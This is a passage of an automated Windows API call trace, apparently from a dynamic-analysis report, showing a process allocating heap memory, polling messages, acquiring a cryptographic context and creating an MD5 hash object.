returned 1 [0185.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0185.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0185.041] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0185.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0185.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0185.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0185.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69bc8 [0185.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0185.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0185.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0185.042] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0185.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0185.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0185.042] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0185.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0185.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0185.045] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0185.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0185.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0185.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0185.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0185.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0185.047] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0185.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0185.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.049] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.049] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0185.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0185.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.049] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.050] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.050] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0185.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0185.050] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.050] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0185.050] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.050] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0185.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0185.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0185.051] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0185.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: 